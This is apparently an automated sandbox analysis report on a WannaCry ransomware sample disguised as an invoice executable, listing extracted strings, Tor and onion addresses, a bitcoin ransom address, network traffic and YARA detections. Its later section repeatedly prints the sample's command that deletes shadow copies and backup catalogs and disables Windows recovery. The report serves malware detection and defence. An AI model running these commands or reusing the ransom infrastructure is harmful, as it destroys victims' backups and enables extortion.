            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3009777131.0000000002595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C12t9YDPgwueZ9NyMgw519p7AA8isjr6SMwgx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
            Source: @WanaDecryptor@.exe, 0000003B.00000002.3002673814.0000000000198000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: C12t9YDPgwueZ9NyMgw519p7AA8isjr6SMwgx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
            Source: @WanaDecryptor@.exe, 0000003F.00000002.3002671502.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: C12t9YDPgwueZ9NyMgw519p7AA8isjr6SMwgx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
            Source: @WanaDecryptor@.exe, 00000041.00000002.2423394506.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: C12t9YDPgwueZ9NyMgw519p7AA8isjr6SMwgx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
            Installs TOR (Internet Anonymizer)
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\tor.exe
            Source: unknownTCP traffic detected without corresponding DNS query: 80.127.137.19
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 80.127.137.19
            Source: unknownTCP traffic detected without corresponding DNS query: 80.127.137.19
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 78.142.142.246
            Source: unknownTCP traffic detected without corresponding DNS query: 78.142.142.246
            Source: unknownTCP traffic detected without corresponding DNS query: 78.142.142.246
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
            Source: taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drString found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
            Source: taskhsvc.exe, 00000056.00000002.3014680639.0000000003670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
            Source: taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drString found in binary or memory: http://freehaven.net/anonbib/#hs-attack06
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000003.2298742785.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3006446411.0000000000A38000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000003B.00000002.3003574685.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000003B.00000000.2402439775.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000003F.00000002.3003497388.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000041.00000002.2423523034.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000047.00000002.2414121733.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000048.00000002.2415651692.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004A.00000002.2417260231.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004C.00000002.2419919555.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004F.00000002.2421966842.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000050.00000002.2423912919.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000053.00000002.2426218309.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000055.00000002.2428422022.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000058.00000002.2432111038.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000059.00000002.2434382646.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005A.00000002.2435991946.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005D.00000002.2438774612.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005E.00000002.2441978280.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000060.00000002.2444345855.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000062.00000002.2446016776.0000000000421000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3006446411.0000000000A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smail
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000003.2298742785.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000003B.00000002.3003574685.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000003B.00000000.2402439775.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000003F.00000002.3003497388.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000041.00000002.2423523034.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000047.00000002.2414121733.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000048.00000002.2415651692.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004A.00000002.2417260231.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004C.00000002.2419919555.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004F.00000002.2421966842.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000050.00000002.2423912919.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000053.00000002.2426218309.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000055.00000002.2428422022.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000058.00000002.2432111038.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000059.00000002.2434382646.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005A.00000002.2435991946.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005D.00000002.2438774612.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005E.00000002.2441978280.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000060.00000002.2444345855.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000062.00000002.2446016776.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000064.00000002.2448697238.0000000000421000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how
            Source: @WanaDecryptor@.exe, 0000003F.00000002.3008943317.0000000000AD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
            Source: taskhsvc.exe, 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmp, taskhsvc.exe, 00000056.00000002.3025101418.000000006CDFC000.00000008.00000001.01000000.00000010.sdmp, libeay32.dll.59.dr, ssleay32.dll.59.drString found in binary or memory: http://www.openssl.org/V
            Source: taskhsvc.exe, 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmp, libeay32.dll.59.drString found in binary or memory: http://www.openssl.org/support/faq.html
            Source: taskhsvc.exe, 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmp, libeay32.dll.59.drString found in binary or memory: http://www.openssl.org/support/faq.htmlRAND
            Source: @WanaDecryptor@.exe, 0000003B.00000003.2425567276.0000000002711000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000056.00000002.3023741238.000000006CD80000.00000008.00000001.01000000.00000011.sdmpString found in binary or memory: http://www.zlib.net/D
            Source: @WanaDecryptor@.exe, 0000003B.00000003.2426018255.0000000002817000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drString found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relay
            Source: @WanaDecryptor@.exe, 0000003B.00000003.2426018255.0000000002817000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drString found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relayError
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3012269724.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696581201119.12791&key=1696581201400600
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3012269724.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696581201119.12791&key=1696581201400600000.1&cta
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3012269724.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3012269724.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: @WanaDecryptor@.exe, 0000003F.00000002.3002671502.000000000019B000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000041.00000002.2423394506.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
            Source: @WanaDecryptor@.exe, 0000003B.00000002.3002673814.0000000000198000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000041.00000002.2423394506.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3012269724.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CLXfQbX4pbW4QbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
            Source: taskhsvc.exe, 00000056.00000002.3014680639.0000000003670000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000056.00000003.2537858182.0000000004358000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000056.00000003.2511720269.000000000482F000.00000004.00000020.00020000.00000000.sdmp, cached-microdesc-consensus.tmp.86.drString found in binary or memory: https://sabotage.net
            Source: taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drString found in binary or memory: https://trac.torproject.org/8742
            Source: taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drString found in binary or memory: https://trac.torproject.org/projects/tor/ticket/14917.
            Source: taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drString found in binary or memory: https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%s
            Source: taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drString found in binary or memory: https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%sDANGEROUS_SOCKS
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3012269724.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_39e4b8f6fd6635158ad433436bdaa069841cfdf8e1989e03
            Source: @WanaDecryptor@.exe, 0000003F.00000002.3008943317.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000003F.00000002.3003497388.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000041.00000002.2423523034.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000047.00000002.2414121733.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000048.00000002.2415651692.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004A.00000002.2417260231.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004C.00000002.2419919555.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004F.00000002.2421966842.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000050.00000002.2423912919.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000053.00000002.2426218309.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000055.00000002.2428422022.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000058.00000002.2432111038.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000059.00000002.2434382646.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005A.00000002.2435991946.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005D.00000002.2438774612.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005E.00000002.2441978280.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000060.00000002.2444345855.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000062.00000002.2446016776.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000064.00000002.2448697238.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000066.00000002.2451103005.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000068.00000002.2453610363.0000000000421000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.google.com/search?q=how
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3012269724.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
            Source: taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drString found in binary or memory: https://www.torproject.org/
            Source: taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drString found in binary or memory: https://www.torproject.org/docs/faq.html#BestOSForRelay
            Source: tor.exe.59.drString found in binary or memory: https://www.torproject.org/documentation.html
            Source: taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drString found in binary or memory: https://www.torproject.org/download/download#warning
            Source: taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drString found in binary or memory: https://www.torproject.org/download/download#warningalphabetaThis
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownHTTPS traffic detected: 77.73.69.128:443 -> 192.168.2.16:49732 version: TLS 1.2

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Detected Wannacry Ransomware
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: CreateFileW,CreateFileW,GetFileSizeEx,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,_local_unwind2,SetFilePointer,SetFilePointer,swprintf,CreateFileW,CreateFileW,ReadFile,SetFilePointer,WriteFile,SetFilePointer,WriteFile,SetFilePointer,rand,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,SetFilePointer,ReadFile,WriteFile,SetFilePointer,ReadFile,WriteFile,_local_unwind2,SetFileTime,FindCloseChangeNotification,CloseHandle,MoveFileW,SetFileAttributesW,DeleteFileW,CloseHandle,MoveFileW,_local_unwind2, WANACRY!10_2_10001960
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: CreateFileW,CreateFileW,GetFileSizeEx,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,_local_unwind2,SetFilePointer,SetFilePointer,swprintf,CreateFileW,CreateFileW,ReadFile,SetFilePointer,WriteFile,SetFilePointer,WriteFile,SetFilePointer,rand,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,SetFilePointer,ReadFile,WriteFile,SetFilePointer,ReadFile,WriteFile,_local_unwind2,SetFileTime,FindCloseChangeNotification,CloseHandle,MoveFileW,SetFileAttributesW,DeleteFileW,CloseHandle,MoveFileW,_local_unwind2, WANACRY!10_2_10001960
            Yara detected Conti ransomware
            Source: Yara matchFile source: Process Memory Space: Proforma Invoice and Bank swift-REG.PI-0086547654.exe PID: 3796, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: @WanaDecryptor@.exe PID: 6568, type: MEMORYSTR
            Yara detected Wannacry ransomware
            Source: Yara matchFile source: 59.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.0.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000003.2298742785.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000003B.00000000.2402439775.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Proforma Invoice and Bank swift-REG.PI-0086547654.exe PID: 3796, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: @WanaDecryptor@.exe PID: 6568, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\Desktop\@WanaDecryptor@.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\@WanaDecryptor@.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\@WanaDecryptor@.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\u.wnry, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, type: DROPPED
            Deletes shadow drive data (may be related to ransomware)
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete Jump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete Jump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000003.2298742785.0000000000A6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000003.2298742785.0000000000A6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
            Source: @WanaDecryptor@.exe, 0000003B.00000000.2402439775.000000000041F000.00000008.00000001.01000000.00000009.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: @WanaDecryptor@.exe, 0000003B.00000000.2402439775.000000000041F000.00000008.00000001.01000000.00000009.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
            Source: @WanaDecryptor@.exe, 00000041.00000003.2422461367.0000000000506000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6UX7Qrunascmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet!
            Source: @WanaDecryptor@.exe, 00000041.00000002.2423394506.000000000019B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: u/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: @WanaDecryptor@.exe, 00000041.00000002.2423688644.0000000000513000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6UX7Qrunascmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet!
            Source: @WanaDecryptor@.exe, 00000041.00000002.2423688644.0000000000549000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9UWindows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet33W
            Source: @WanaDecryptor@.exe, 00000041.00000003.2422461367.0000000000527000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: @WanaDecryptor@.exe, 00000041.00000003.2422461367.0000000000527000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9UWindows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet33W
